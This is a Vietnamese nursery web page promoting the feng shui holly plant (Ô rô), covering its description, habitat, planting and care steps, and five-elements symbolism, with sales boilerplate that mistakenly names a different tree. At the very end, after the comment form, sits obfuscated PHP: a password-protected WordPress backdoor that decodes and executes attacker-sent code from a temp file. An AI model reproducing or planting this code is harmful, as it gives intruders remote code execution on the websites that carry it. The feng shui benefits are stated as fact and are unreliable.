Những Điều Có Thể Bạn Chưa Biết Về Cây Ô Rô Phong Thủy

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây Ô rô phong thủy là loài cây phong thủy được nhiều người tin tưởng chọn lựa. Tuy nhiên đây vẫn là một loài cây khá xa lạ với nhiều người. Trong bài viết này, Vườn cây Hòa Bình sẽ chỉ cho bạn những điều đặc biển ở cây Ô rô mà có thể cả những người sở hữu cây này cũng chưa biết nhé!

Đôi nét về cây Ô rô
Đôi nét về cây Ô rô

Đôi nét về cây Ô rô

Cây Ô rô còn có các tên gọi khác như: Ô rô gai, ô rô nước, lão thử lặc, ắc ó, câu dã hồng hoa, sơn ngưu bàng.

Cây Ô rô thuộc vào nhóm cây nhỏ, mỗi cây có chiều cao khoảng từ 0,6-1,5m. Thân cây  tròn nhẵn, không có lông, có màu lục nhạt và có lấm tấm đen.

Lá ô rô có hình mác, chiều rộng từ 4-8cm  chiều dài từ 15-20cm. Lá của cây thường mọc đối xứng với nhau, lá không có cuống, phiến lá cứng và cũng không lông. Đầu lá nhọn sắc, mép lá có răng cứng rất nhọn, gốc lá tròn.

Hoa của cây Ô rô cạn có màu tím hồng, hoa của cây Ô rô nước có màu trắng tinh khiết. Cây ô rô nở hoa quanh năm nhưng phần lớn là mùa xuân và mùa thu. Quả Ô rô là dạng quả nang, gồm 4 hạt dẹp chiều dài của quả khoảng 2cm.

Cây Ô rô thường mọc theo đám lớn, mọc hoang khá nhiều bên bờ kênh rạch. Hoặc cây còn có thể thường được tìm thấy ở trên đất lầy thụt cửa sông thông ra biển và ít hơn quanh ao hồ hoặc vùng đồng chiêm trũng.

Ở Việt Nam, cây Ô rô mọc hoang chủ yếu ở các tỉnh miền Bắc và miền Trung. Ngoài ra, cây Ô rô cũng phân bố một lượng lớn tại nước trong khu vực châu Á như: Malaixia, Inđônêxia, Nhật Bản, Ấn Độ, Thái Lan, và Trung Quốc (tình Vân Nam, Quảng Tây, Quảng Đông,…).

>>> Xem thêm: Giải mã cây xoài tứ quý.

Cách trồng cây Ô rô kích thích phong thủy

Cách trồng cây Ô rô thu hút năng lượng phong thủy tốt mà bạn có thể tham khảo để tự trồng trong gia đình của mình.

Bước 1: Chọn vị trí trồng cây Ô rô

Cây Ô rô ưa những vị trí có nhiều nắng hoặc là những nơi có nắng chiếu xiên cũng rất thích hợp cho cây phát triển. Nếu bạn trồng cây này ở nơi râm mát thì cây sẽ ít phân cành, lá cây sẽ to hơn vì không đủ ánh sáng cho quá trình quang hợp của cây.

Cách trồng cây Ô rô kích thích phong thủy
Cách trồng cây Ô rô kích thích phong thủy

Bước 2: Chuẩn bị hốc trồng cây Ô rô

Hốc trồng cây Ô rô phải đủ rộng và sâu để đặt phần bầu Ô rô giống. Sau khi đã chuẩn bị đường hốc, bạn nhẹ nhàng gỡ bỏ túi bầu và đặt cẩn thận bầu đất xuống hốc đã đào. 

Bạn cần cẩn thận để tránh làm vỡ bầu đất, dẫn đến việc cây không thể phát triển khỏe mạnh. Sau khi đặt cây xuống hốc, bạn vui lại đất, ấn nhẹ xung quanh gốc cây và tưới một chút nước.

Bước 3: Tưới nước cho cây Ô rô

Trong một năm đầu khi bạn trồng cây Ô rô, bạn tưới nước cho cây 2 lần mỗi tuần với lượng nước vừa đủ để duy trì độ ẩm cần thiết cho đất. 

Vào mùa sinh trưởng thứ 2 của cây thì nên giảm còn 1 tuần 1 lần. Bạn không nên tưới nước quá nhiều và thường xuyên sẽ làm cây bị thối rữa, chết.

Bước 4: Bón phân cho cây Ô rô

Bạn nên bón phân định kỳ cho cây 2 lần một năm. Bón phân đều đặn sẽ giúp cây phát triển tốt. Đợt 1 nên bón lót cho cây vào đầu mùa xuân và đợt 2 là bón thúc vào đầu mùa thu. 

Khi bón phân, bạn nên tuân theo những lưu ý của nhà sản xuất để cây có được hiệu quả tốt nhất.

Bước 5: Thường xuyên kiểm tra cây Ô rô

Việc kiểm tra cây thường xuyên là vô cùng quan trọng. Bạn sẽ kiểm tra xem cây có dấu hiệu bị côn trùng phá hoại không hay bị ốc sên ăn lá không. 

Nếu có, bạn nên lần theo những vết sang do ốc sên để lại khi di chuyển để tìm ra chúng và chuyển ốc sên ra nơi khác, xa khỏi cây trồng.

Chăm sóc cây ô rô đúng cách
Chăm sóc cây ô rô đúng cách

>>> Xem thêm: Những sản phẩm cây phong thủy được ưa chuộng nhất.

Tác dụng của cây Ô rô phong thủy

Cây Ô rô cũng là loại cây được nhiều gia đình lựa chọn để làm những sản phẩm cây phong thủy trang trí. Cây Ô rô thường được trồng để trang trí không gian sân vườn hoặc làm hàng rào từ cây này cũng rất đẹp.

Cây Ô rô cạn có màu tím ( Mang hành Hỏa) rất phù hợp với những người mang mệnh Thổ theo tương sinh trong ngũ hành. Hoặc người mang mệnh Hỏa theo quan hệ tương hợp trong ngũ hành.

Cây Ô rô nước có màu trắng ( Mang hành Kim) rất phù hợp với những người mang mệnh Thủy theo tương sinh trong ngũ hành. Hoặc người mang mệnh Kim theo quan hệ tương hợp trong ngũ hành.

Cây Ô rô có tác dụng thanh lọc không khí, mang lại không gian sống trong lành và tươi mát. Điều này sẽ giúp cho tinh thần của mọi người sẽ trở nên tỉnh táo và sáng suốt hơn trong khi đưa ra mọi quyết định.

Địa chỉ mua cây Ô rô phong thủy chất lượng

Vườn cây Hòa Bình là một trong những địa chỉ cung cấp những mẫu cây phong thủy chất lượng và được nhiều khách hàng tin tưởng ủng hộ trong suốt thời gian qua. 

Để không phụ lòng tin tưởng của khách hàng, chúng tôi luôn cố gắng hằng ngày để mang lại những sản phẩm tốt và không làm những khách hàng của mình thất vọng.

Hy vọng rằng những chia sẻ vừa rồi đã giúp cho bạn hiểu thêm về cây Ô rô cũng như có thêm một địa chỉ mua cây phong thủy uy tín, chất lượng cao.

Tác dụng của cây Ô rô phong thủy
Tác dụng của cây Ô rô phong thủy

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}